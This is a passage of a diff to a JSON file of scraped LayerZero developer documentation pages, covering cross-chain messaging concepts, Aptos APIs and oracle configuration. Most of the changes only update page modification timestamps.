(e.g. more efficient proof technologies). This allows LayerZero to bring the best research into production and support the system with the best technology. The UA interface won't change and UA can simply migrate to any new version with ease. For each Messaging Library (e.g. Ultra-Light Node), LayerZero can deploy new proof validation libraries for security or performance reasons. Immutable UA Configuration If the UA has specified a validation library to use, no entity can change the configuration. Concepts - Previous LayerZero Endpoint Next - Concepts Glossary Last modified 3mo ago", + "body": "Future-Proof Architecture Immutable Endpoint LayerZero Endpoint is the only interface for a User Application (UA). The Endpoint allows UAs to configure the Messaging Library used for sending and receiving verified messages, and guarantees the message delivering ordering across all messaging libraries. Send() : the message will be sent through the endpoint first and then redirected to the UA-configured Messaging Library Receive() : the message will be verified at the Messaging Library first then forwarded to the endpoint and eventually delivered to the UA. Perpetual Messaging All Messaging Libraries, once deployed, will be in service in perpetuity, which means that no entity, including the LayerZero Labs multi-sig, can de-register any Messaging Library or change the Messaging Library configuration of a UA, i.e. if the UA has specified a Messaging Library to use, no entity can stop the messaging flow. Continuous Improvement LayerZero can deploy new Messaging Libraries for security and performance optimization (e.g. more efficient proof technologies). This allows LayerZero to bring the best research into production and support the system with the best technology. The UA interface won't change and UA can simply migrate to any new version with ease. For each Messaging Library (e.g. Ultra-Light Node), LayerZero can deploy new proof validation libraries for security or performance reasons. Immutable UA Configuration If the UA has specified a validation library to use, no entity can change the configuration. Concepts - Previous LayerZero Endpoint Next - Concepts Glossary Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1282,7 +1274,7 @@ { "title": "Glossary", "html_url": "https://layerzero.gitbook.io/docs/faq/glossary", - "body": "Glossary This glossary defines and explains many LayerZero concepts and terminology. User Application (UA) A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. We define UA as a tuple ( chainId , contractAddress ) the UA that send() the message at the source chain as srcUA ( srcChain , srcAddress ) the UA that lzReceive() at the destination chain as dstUA ( dstChain , dstAddress ) In LayerZero's perspective, srcUA and dstUA are different, though they might be the same entity. Ultra-Light Node (ULN) ULN is a messaging protocol, firstly introduced in the LayerZero white paper, that allows lightweight cross-chain messaging with configurable trustlessness on the specification of Oracle and Relayer, the two roles that are relaying block information and transaction proof across chains. Oracle A contract address that can be notified to move a block header. What is a Relayer? Any process that delivers a transaction proof in the LayerZero system. Messaging Library The contract that handles the message payload packing on the source chain and verification on the destination chain. Ultra-Light Node is an implementation of Messaging Library Proof Library The contract that verifies the validity of a proof. Merkle Patricia Tree inclusion proof is an implementation of Proof Library. Concepts - Previous Future-Proof Architecture Next - Concepts FAQ Last modified 2mo ago", + "body": "Glossary This glossary defines and explains many LayerZero concepts and terminology. User Application (UA) A User Application (UA) is any contract that uses LayerZero to send & receive messages between blockchains. We define UA as a tuple ( chainId , contractAddress ) the UA that send() the message at the source chain as srcUA ( srcChain , srcAddress ) the UA that lzReceive() at the destination chain as dstUA ( dstChain , dstAddress ) In LayerZero's perspective, srcUA and dstUA are different, though they might be the same entity. Ultra-Light Node (ULN) ULN is a messaging protocol, firstly introduced in the LayerZero white paper, that allows lightweight cross-chain messaging with configurable trustlessness on the specification of Oracle and Relayer, the two roles that are relaying block information and transaction proof across chains. Oracle A contract address that can be notified to move a block header. What is a Relayer? Any process that delivers a transaction proof in the LayerZero system. Messaging Library The contract that handles the message payload packing on the source chain and verification on the destination chain. Ultra-Light Node is an implementation of Messaging Library Proof Library The contract that verifies the validity of a proof. Merkle Patricia Tree inclusion proof is an implementation of Proof Library. Concepts - Previous Future-Proof Architecture Next - Concepts FAQ Last modified 3mo ago", "labels": [ "Documentation" ] @@ -1290,7 +1282,7 @@ { "title": "LayerZero Endpoint", "html_url": "https://layerzero.gitbook.io/docs/faq/layerzero-endpoint", - "body": "LayerZero Endpoint Messages in LayerZero are sent and received by LayerZero Endpoints , which handle message transmission, verification, and receipt; these endpoints consist of two components: a collection of versioned messaging libraries , and a proxy to route messages to the correct library version. When a message arrives at an endpoint, the endpoint selects the User Application configured library version to handle the message. The endpoint keeps all message states across versions and this allows libraries to be easily upgraded for fixes or optimizations. Messaging Library Versioning UAs can specify a particular messaging library version to tightly control messaging behaviors, or alternatively specify DEFAULT_VERSION to take advantage of library auto-upgrade. Note that the library versions on the send() and lzReceive() sides must be the same for an INFLIGHT message to be delivered. Ultra-Light Node is the V1 of messaging libraries. interface ILayerZeroEndpoint.sol // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ) Messaging Library Migration The LayerZero endpoint has only implemented one library version (Ultra-Light Node). We will release guides for migration when we have deployed any new messaging library. Concepts - Previous Messaging Properties Next - Concepts Future-Proof Architecture Last modified 3mo ago", + "body": "LayerZero Endpoint Messages in LayerZero are sent and received by LayerZero Endpoints , which handle message transmission, verification, and receipt; these endpoints consist of two components: a collection of versioned messaging libraries , and a proxy to route messages to the correct library version. When a message arrives at an endpoint, the endpoint selects the User Application configured library version to handle the message. The endpoint keeps all message states across versions and this allows libraries to be easily upgraded for fixes or optimizations. Messaging Library Versioning UAs can specify a particular messaging library version to tightly control messaging behaviors, or alternatively specify DEFAULT_VERSION to take advantage of library auto-upgrade. Note that the library versions on the send() and lzReceive() sides must be the same for an INFLIGHT message to be delivered. Ultra-Light Node is the V1 of messaging libraries. interface ILayerZeroEndpoint.sol // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ) Messaging Library Migration The LayerZero endpoint has only implemented one library version (Ultra-Light Node). We will release guides for migration when we have deployed any new messaging library. Concepts - Previous Messaging Properties Next - Concepts Future-Proof Architecture Last modified 21d ago", "labels": [ "Documentation" ] @@ -1298,7 +1290,7 @@ { "title": "Messaging Properties", "html_url": "https://layerzero.gitbook.io/docs/faq/messaging-properties", - "body": "Messaging Properties Message State Messages are sent from the User Application (UA) at source srcUA to the UA at the destination dstUA . Once the message is received by dstUA , the message is considered delivered (transitioning from INFLIGHT to either SUCCESS or STORED ) Message State Cases INFLIGHT After a message is sent SUCCESS A1: dstUA success OK() A2: dstUA fails with caught error/exception STORED B1: dstUA fails with uncaught error/exception // message handling at destination chain try ILayerZeroReceiver ( _dstAddress ). lzReceive { gas : _gasLimit }( _srcChainId , _srcAddress , _nonce , _payload ) { // message state becomes SUCCESS } catch { // message state becomes STORED emit PayloadStored ( _srcChainId , _srcAddress , _dstAddress , _payload ); } Case A2: dstUA is expected to store the message in their contract to be retried (LayerZero will not store any successfully delivered messages). dstUA is expected to monitor and retry STORED messages on behalf of its users. Case B1: dstUA is expected to gracefully handle all errors/exceptions when receiving a message, and any uncaught errors/exceptions (including out-of-gas) will cause the message to transition into STORED . A STORED message will block the delivery of any future message from srcUA to all dstUA on the same destination chain and can be retried until the message becomes SUCCESS . dstUA should implement a handler to transition the stored message from STORED to SUCCESS . If a bug in dstUA contract results in an unrecoverable error/exception, LayerZero provides a last-resort interface to force resume message delivery, only by the dstUA contract. Message Ordering LayerZero provides ordered delivery of messages from a given sender to a destination chain, i.e. srcUA -> dstChain . In other words, the message order nonce is shared by all dstUA on the same dstChain . That's why a STORED message blocks the message pathway from srcUA to all dstUA on the same destination chain. If it isn't necessary to preserve the sequential nonce property for a particular dstUA the sender must add the nonce into the payload and handle it end-to-end within the UA. UAs can implement a non-blocking pattern in their contract code. Extensibility Message Adapter Parameters LayerZero allows UAs to add arbitrary transaction params in the send() function, providing a high level of flexibility and opening up opportunities for a diverse set of 3rd party plugins This is implemented as an unreserved byte array parameter to the send() function, with UAs allowed to write any additional data necessary into that parameter. We recommend that UAs leave some degree of configurability for the extra parameters to allow for feature extensions. One great feature of _adapterParams is performing an Airdrop . Patterns Non-Reentrancy LayerZero Endpoint has a non-reentrancy guard for both the send() and receive() , respectively. In other words, both send() and receive() can not call themselves on the same chain. UAs should not rely on LayerZero to perform the non-reentrancy check. However, UAs can query the endpoint to see if the endpoint isSendingPayload() or isReceivingPayload() for finer-grained reentrancy control. Message Chaining UAs can call send() in the receive() calls on the same chain. Example applications for calling send() in the receive() include (e.g. Ping Pong ): the UA at the source chain wants a message receipt (Chain A -> Chain B -> Chain A) the UA at the destination reroutes the message (Chain A -> Chain B -> Chain C) function lzReceive ( uint16 _srcChainId , bytes memory _fromAddress , uint64 , /*_nonce*/ bytes memory _payload ) external override { ... // message chaining endpoint . send { value : messageFee }( ... ); } However, the fee for sending messages on another chain is not observable on-chain. UAs would need to create some fee estimate heuristics. Optionally, user apps can store the chained message and then resend them with another transaction. Multi-Send UAs can send multiple messages in one transaction at the source chain. The endpoint non-reentrancy will not block this pattern. function sendFirstMessage ( uint gasAmountForDst , uint16 [] calldata chainIds , bytes [] calldata dstAddresses ) external payable { ... for ( uint i = 0 ; i < chainIds . length ; i ++ ){ endpoint . send { value : fee }( chainIds [ i ], dstAddresses [ i ], messageString , msg . sender , address ( 0x0 ), _relayerParams ); } } Bug Bounty - Previous Bug Bounty Program Next - Concepts LayerZero Endpoint Last modified 3mo ago", + "body": "Messaging Properties Message State Messages are sent from the User Application (UA) at source srcUA to the UA at the destination dstUA . Once the message is received by dstUA , the message is considered delivered (transitioning from INFLIGHT to either SUCCESS or STORED ) Message State Cases INFLIGHT After a message is sent SUCCESS A1: dstUA success OK() A2: dstUA fails with caught error/exception STORED B1: dstUA fails with uncaught error/exception // message handling at destination chain try ILayerZeroReceiver ( _dstAddress ). lzReceive { gas : _gasLimit }( _srcChainId , _srcAddress , _nonce , _payload ) { // message state becomes SUCCESS } catch { // message state becomes STORED emit PayloadStored ( _srcChainId , _srcAddress , _dstAddress , _payload ); } Case A2: dstUA is expected to store the message in their contract to be retried (LayerZero will not store any successfully delivered messages). dstUA is expected to monitor and retry STORED messages on behalf of its users. Case B1: dstUA is expected to gracefully handle all errors/exceptions when receiving a message, and any uncaught errors/exceptions (including out-of-gas) will cause the message to transition into STORED . A STORED message will block the delivery of any future message from srcUA to all dstUA on the same destination chain and can be retried until the message becomes SUCCESS . dstUA should implement a handler to transition the stored message from STORED to SUCCESS . If a bug in dstUA contract results in an unrecoverable error/exception, LayerZero provides a last-resort interface to force resume message delivery, only by the dstUA contract. Message Ordering LayerZero provides ordered delivery of messages from a given sender to a destination chain, i.e. srcUA -> dstChain . In other words, the message order nonce is shared by all dstUA on the same dstChain . That's why a STORED message blocks the message pathway from srcUA to all dstUA on the same destination chain. If it isn't necessary to preserve the sequential nonce property for a particular dstUA the sender must add the nonce into the payload and handle it end-to-end within the UA. UAs can implement a non-blocking pattern in their contract code. Extensibility Message Adapter Parameters LayerZero allows UAs to add arbitrary transaction params in the send() function, providing a high level of flexibility and opening up opportunities for a diverse set of 3rd party plugins This is implemented as an unreserved byte array parameter to the send() function, with UAs allowed to write any additional data necessary into that parameter. We recommend that UAs leave some degree of configurability for the extra parameters to allow for feature extensions. One great feature of _adapterParams is performing an Airdrop . Patterns Non-Reentrancy LayerZero Endpoint has a non-reentrancy guard for both the send() and receive() , respectively. In other words, both send() and receive() can not call themselves on the same chain. UAs should not rely on LayerZero to perform the non-reentrancy check. However, UAs can query the endpoint to see if the endpoint isSendingPayload() or isReceivingPayload() for finer-grained reentrancy control. Message Chaining UAs can call send() in the receive() calls on the same chain. Example applications for calling send() in the receive() include (e.g. Ping Pong ): the UA at the source chain wants a message receipt (Chain A -> Chain B -> Chain A) the UA at the destination reroutes the message (Chain A -> Chain B -> Chain C) function lzReceive ( uint16 _srcChainId , bytes memory _fromAddress , uint64 , /*_nonce*/ bytes memory _payload ) external override { ... // message chaining endpoint . send { value : messageFee }( ... ); } However, the fee for sending messages on another chain is not observable on-chain. UAs would need to create some fee estimate heuristics. Optionally, user apps can store the chained message and then resend them with another transaction. Multi-Send UAs can send multiple messages in one transaction at the source chain. The endpoint non-reentrancy will not block this pattern. function sendFirstMessage ( uint gasAmountForDst , uint16 [] calldata chainIds , bytes [] calldata dstAddresses ) external payable { ... for ( uint i = 0 ; i < chainIds . length ; i ++ ){ endpoint . send { value : fee }( chainIds [ i ], dstAddresses [ i ], messageString , msg . sender , address ( 0x0 ), _relayerParams ); } } Bug Bounty - Previous Bug Bounty Program Next - Concepts LayerZero Endpoint Last modified 21d ago", "labels": [ "Documentation" ] @@ -1306,15 +1298,23 @@ { "title": "Audits", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/audits", - "body": "Audits LayerZero Labs has commissioned 35+ audits with the most recent audits on Github . Nearly all code written by LayerZero Labs since inception have been immutable smart contracts audited externally and rigorously reviewed internally at least 3+ times each. GitHub - LayerZero-Labs/Audits GitHub LayerZero Labs Audit Repository Previous Deprecated Libraries Last modified 7mo ago", + "body": "Audits LayerZero Labs has commissioned 35+ audits with the most recent audits on Github . Nearly all code written by LayerZero Labs since inception have been immutable smart contracts audited externally and rigorously reviewed internally at least 3+ times each. GitHub - LayerZero-Labs/Audits GitHub LayerZero Labs Audit Repository Previous Deprecated Libraries Last modified 8mo ago", "labels": [ "Documentation" ] }, { - "title": "LayerZero Interfaces", + "title": "Interfaces", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces", - "body": "LayerZero Interfaces Developers may need one or more of these interfaces when working with LayerZero contracts. https://github.com/LayerZero-Labs/LayerZero/tree/main/contracts/interface github.com Ultra-Light Node Interfaces See our contract interfaces here . Previous Multisig Wallets Next - Technical Reference SDK Last modified 3mo ago", + "body": "Interfaces Interfaces to the LayerZero contracts Interfaces for interacting with LayerZero contracts, including the Endpoint . Previous Multisig Wallets Next EVM (Solidity) Interfaces Last modified 21d ago", + "labels": [ + "Documentation" + ] + }, + { + "title": "LayerZero Interfaces", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces-1", + "body": "LayerZero Interfaces Developers may need one or more of these interfaces when working with LayerZero contracts. https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/lzApp/interfaces Ultra-Light Node Interfaces See our contract interfaces here . Previous ILayerZeroRelayer.sol Next - Technical Reference SDK Last modified 21d ago", "labels": [ "Documentation" ] @@ -1322,7 +1322,7 @@ { "title": "Mainnet", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet", - "body": "Mainnet LayerZero mainnet deployments. The Mainnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) ETH, BNB, AVAX, etc.. for the chains you need Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous Default Config Next Mainnet Addresses Last modified 1mo ago", + "body": "Mainnet LayerZero mainnet deployments. The Mainnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) ETH, BNB, AVAX, etc.. for the chains you need Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous Default Config Next Mainnet Addresses Last modified 2mo ago", "labels": [ "Documentation" ] @@ -1338,7 +1338,7 @@ { "title": "SDK", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/sdk", - "body": "SDK Coming Soon SDK for Testnet / Mainnet Deployment Addresses. Technical Reference - Previous LayerZero Interfaces Next - Technical Reference Proof Types Last modified 3mo ago", + "body": "SDK Coming Soon SDK for Testnet / Mainnet Deployment Addresses. Technical Reference - Previous LayerZero Interfaces Next - Technical Reference Proof Types Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1346,7 +1346,7 @@ { "title": "Testnet", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/testnet", - "body": "Testnet LayerZero testnet is a deployed set of Endpoints on the chains we operate on. The Testnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) Test ether Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous zkLightClient Addresses Next Testnet Addresses Last modified 13d ago", + "body": "Testnet LayerZero testnet is a deployed set of Endpoints on the chains we operate on. The Testnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) Test ether Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous zkLightClient Addresses Next Testnet Addresses Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1354,7 +1354,7 @@ { "title": "Estimating Message Fees", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/code-examples/estimating-message-fees", - "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message If you want to know how much AptosCoin to pay for the message, you can call the Endpoint's quote_fee() to get the fee tuple (native_fee (in coin), layerzero_fee (in coin)). public fun quote_fee ( ua_address : address , dst_chain_id : u64 , payload_size : u64 , pay_in_zro : bool , adapter_params : vector < u8 > , msglib_params : vector < u8 > ): ( u64 , u64 ) Previous OmniCounter.move Next - Aptos Guide UA Custom Configuration Last modified 3mo ago", + "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message If you want to know how much AptosCoin to pay for the message, you can call the Endpoint's quote_fee() to get the fee tuple (native_fee (in coin), layerzero_fee (in coin)). public fun quote_fee ( ua_address : address , dst_chain_id : u64 , payload_size : u64 , pay_in_zro : bool , adapter_params : vector < u8 > , msglib_params : vector < u8 > ): ( u64 , u64 ) Previous OmniCounter.move Next - Aptos Guide UA Custom Configuration Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1362,7 +1362,7 @@ { "title": "OmniCounter.move", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/code-examples/messagecounter.move", - "body": "OmniCounter.move A LayerZero User Application example to demonstrate message sending. The OmniCounter OmniCounter is a contract that increments a counter -- but there's a twist. This OmniCounter increments the counter on another chain. The Details To send cross chain messages, contracts will use an endpoint to send() from the source chain and lz_receive() to receive the message on the destination chain. LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub Aptos Guide - Previous Code Examples Next Estimating Message Fees Last modified 10mo ago", + "body": "OmniCounter.move A LayerZero User Application example to demonstrate message sending. The OmniCounter OmniCounter is a contract that increments a counter -- but there's a twist. This OmniCounter increments the counter on another chain. The Details To send cross chain messages, contracts will use an endpoint to send() from the source chain and lz_receive() to receive the message on the destination chain. LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub Aptos Guide - Previous Code Examples Next Estimating Message Fees Last modified 18d ago", "labels": [ "Documentation" ] @@ -1370,7 +1370,7 @@ { "title": "Register UA", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master/how-to-send-a-message", - "body": "Register UA Before sending messages on LayerZero you need to register your UA. public fun register_ua < UA > ( account : & signer ): UaCapability < UA > The UA type is an identifier of your application. You can use any type as UA , e.g. 0x1::MyApp::MyApp as a UA . Only one UA is allowed per address. That means there won't be a case where two UA types share the same address. When calling register_ua() , you will get a UaCapability returned. It is the resource for authenticating any LayerZero functions, such as sending messages and setting configurations. Aptos Guide - Previous Getting Started Next Send Messages Last modified 3mo ago", + "body": "Register UA Before sending messages on LayerZero you need to register your UA. public fun register_ua < UA > ( account : & signer ): UaCapability < UA > The UA type is an identifier of your application. You can use any type as UA , e.g. 0x1::MyApp::MyApp as a UA . Only one UA is allowed per address. That means there won't be a case where two UA types share the same address. When calling register_ua() , you will get a UaCapability returned. It is the resource for authenticating any LayerZero functions, such as sending messages and setting configurations. Aptos Guide - Previous Getting Started Next Send Messages Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1378,7 +1378,7 @@ { "title": "Send Messages", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master/how-to-send-a-message-1", - "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts to send a cross chain message. public fun send < UA > ( dst_chain_id : u64 , dst_address : vector < u8 > , payload : vector < u8 > , native_fee : Coin < AptosCoin > , zro_fee : Coin < ZRO > , adapter_params : vector < u8 > , msglib_params : vector < u8 > , _cap : & UaCapability < UA > ): ( u64 , Coin < AptosCoin > , Coin < ZRO > ) You can send any message ( payload ) to any address on any chain and pay fee with AptosCoin . So far we only support AptosCoin as fee. ZRO coin will be supported to pay the protocol fee in the future. The msglib_params is for passing parameters to the message libraries. So far, it is not used and can be empty. Estimating Message Fees If you want to know how much to give to the send() function to pay for you message please refer to this section on estimating fees . Previous Register UA Next Receive Messages Last modified 3mo ago", + "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts to send a cross chain message. public fun send < UA > ( dst_chain_id : u64 , dst_address : vector < u8 > , payload : vector < u8 > , native_fee : Coin < AptosCoin > , zro_fee : Coin < ZRO > , adapter_params : vector < u8 > , msglib_params : vector < u8 > , _cap : & UaCapability < UA > ): ( u64 , Coin < AptosCoin > , Coin < ZRO > ) You can send any message ( payload ) to any address on any chain and pay fee with AptosCoin . So far we only support AptosCoin as fee. ZRO coin will be supported to pay the protocol fee in the future. The msglib_params is for passing parameters to the message libraries. So far, it is not used and can be empty. Estimating Message Fees If you want to know how much to give to the send() function to pay for you message please refer to this section on estimating fees . Previous Register UA Next Receive Messages Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1386,7 +1386,7 @@ { "title": "Receive Messages", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master/receive-messages", - "body": "Receive Messages Destination contracts must implement lzReceive() to handle incoming messages The UA has to provide a public entry function lz_receive() for executors to receive messages from other chains and execute your business logic. public entry fun lz_receive < Type1 , Type2 , ... > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ) The lz_receive() function has to call the Endpoint's lz_receive() function to verify the payload and get the nonce. // endpoint's lz_receive() public fun lz_receive < UA > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > , _cap : & UaCapability < UA > ): u64 When an executor calls your UA's lz_receive() , it needs to know what generic types to use for consuming the payload. So if your UA needs those types, you also need to provide a public entry function lz_receive_types() to return the types. Make sure to assert the provided types against the payload. For example, if the payload indicates coinType A, then the provided coinType must be A. public fun lz_receive_types ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ): vector < TypeInfo > Blocking Mode LayerZero is by BLOCKING by default, which means if the message payload fails in the lz_receive() function, your UA will be blocked and cannot receive next messages from that path until the failed message is received successfully. If this happens, you may have to drop the message or store it and retry later. We provide LZApp Modules to help you handle it. Previous Send Messages Next - Aptos Guide LZApp Modules Last modified 3mo ago", + "body": "Receive Messages Destination contracts must implement lzReceive() to handle incoming messages The UA has to provide a public entry function lz_receive() for executors to receive messages from other chains and execute your business logic. public entry fun lz_receive < Type1 , Type2 , ... > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ) The lz_receive() function has to call the Endpoint's lz_receive() function to verify the payload and get the nonce. // endpoint's lz_receive() public fun lz_receive < UA > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > , _cap : & UaCapability < UA > ): u64 When an executor calls your UA's lz_receive() , it needs to know what generic types to use for consuming the payload. So if your UA needs those types, you also need to provide a public entry function lz_receive_types() to return the types. Make sure to assert the provided types against the payload. For example, if the payload indicates coinType A, then the provided coinType must be A. public fun lz_receive_types ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ): vector < TypeInfo > Blocking Mode LayerZero is by BLOCKING by default, which means if the message payload fails in the lz_receive() function, your UA will be blocked and cannot receive next messages from that path until the failed message is received successfully. If this happens, you may have to drop the message or store it and retry later. We provide LZApp Modules to help you handle it. Previous Send Messages Next - Aptos Guide LZApp Modules Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1394,7 +1394,7 @@ { "title": "Chainlink Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/chainlink-oracle", - "body": "Chainlink Oracle Contract Addresses to use Chainlink with LayerZero To use the Chainlink oracle with your LayerZero UserApplication, configure your app with the addresses below. Chainlink Oracle Addresses Ethereum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 BNB: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Avalanche: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Polygon: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Arbitrum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Optimism: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Fantom: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 There is some additional information for Chainlink that can be found here . Participating Node Operators Currently these Chainlink nodes provide support and redundancy for the Chainlink Oracle DexTrac Chainlayer LinkForest LinkPool Previous TSS Oracle Next Overview of Polyhedra zkLightClient Last modified 16d ago", + "body": "Chainlink Oracle Contract Addresses to use Chainlink with LayerZero To use the Chainlink oracle with your LayerZero UserApplication, configure your app with the addresses below. Chainlink Oracle Addresses Ethereum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 BNB: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Avalanche: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Polygon: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Arbitrum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Optimism: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Fantom: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 There is some additional information for Chainlink that can be found here . Participating Node Operators Currently these Chainlink nodes provide support and redundancy for the Chainlink Oracle DexTrac Chainlayer LinkForest LinkPool Previous TSS Oracle Next Overview of Polyhedra zkLightClient Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1402,7 +1402,7 @@ { "title": "Configuring Custom Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/configuring-custom-oracle", - "body": "Configuring Custom Oracle Learn how to seamlessly set up and integrate a new Oracle for your User Application (UA). This tutorial provides a step-by-step guide on setting a new Oracle for your User Application (UA). Understanding Oracle Configuration In LayerZero, Oracle configurations help enable smooth messaging across chain pathways. A chain pathway represents a connected route that utilizes both the Oracle and Relayer to facilitate message routing between blockchains. 1. Consistent Oracle Configuration: It's essential to ensure that the same Oracle provider is present on both the source and destination chains. This uniformity guarantees that messages can be reliably sent and received in both directions on the pathway. 2. Payment and Delivery Logic: If you're paying Oracle A on the source chain, you'd expect Oracle A to also handle the delivery on the destination chain. Hence, if Oracle A is available on both chains, it can be used in both directions. On the other hand, if Oracle A is only present on one chain, you'd need to opt for an alternative that's supported on both chain directions. Remember, the objective is to ensure that the Oracle setup supports the chain pathways, as they are the conduits for message routing. This is vital for efficient, error-free cross-chain communication. Prerequisites You should have an LZApp to start with that's already working with default settings. While we use OmniCounter in this tutorial, any app that inherits LZApp.sol (including the OFT and ONFT standards) can be used. In order to set a new Oracle, all a user will need to do is call the setConfig function on Chain A and Chain B. Below is a simple example for how to set your Oracle, using the Ethereum Goerli and Optimism Goerli Testnets. Example: Setting an Oracle using Ethereum Goerli and Optimism Goerli Testnets 1. Deploying OmniCounter After deploying OmniCounter on both Goerli and OP-Goerli, ensure that: You've correctly called setTrustedRemote . The incrementCounter function works by default on both contracts. // SPDX-License-Identifier: MIT pragma solidity ^ 0.8.0 ; pragma abicoder v2 ; import \"https://github.com/LayerZero-Labs/solidity-examples/blob/e43908440cefdcbc93cd8e0ea863326c4bd904eb/contracts/lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { bytes public constant PAYLOAD = \"\\x01\\x02\\x03\\x04\" ; uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { counter += 1 ; } function estimateFee ( uint16 _dstChainId , bool _useZro , bytes calldata _adapterParams ) public view returns ( uint nativeFee , uint zroFee ) { return lzEndpoint . estimateFees ( _dstChainId , address ( this ), PAYLOAD , _useZro , _adapterParams ); } function incrementCounter ( uint16 _dstChainId ) public payable { _lzSend ( _dstChainId , PAYLOAD , payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" ), msg . value ); } } 2. Setting a New Oracle To modify your UA contracts, you'll need to invoke the setConfig function. This can be done directly from a verified block explorer or using scripting tools. In this tutorial, we'll demonstrate using Remix. Here's how to set the Oracle for the Goerli OmniCounter using the Goerli TSS Oracle address, 0x36ebea3941907c438ca8ca2b1065deef21ccdaed : 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ \"0x36ebea3941907c438ca8ca2b1065deef21ccdaed\" ] // oracleAddress 4 ) 5 await lzEndpoint . setConfig ( 6 0 , // default library version 7 10132 , // dstChainId 8 6 , // CONFIG_TYPE_ORACLE 9 0x00000000000000000000000036ebea3941907c438ca8ca2b1065deef21ccdaed // config 10 ) This process should be repeated on both the source and destination contracts. Ensure you adjust the _dstChainId and 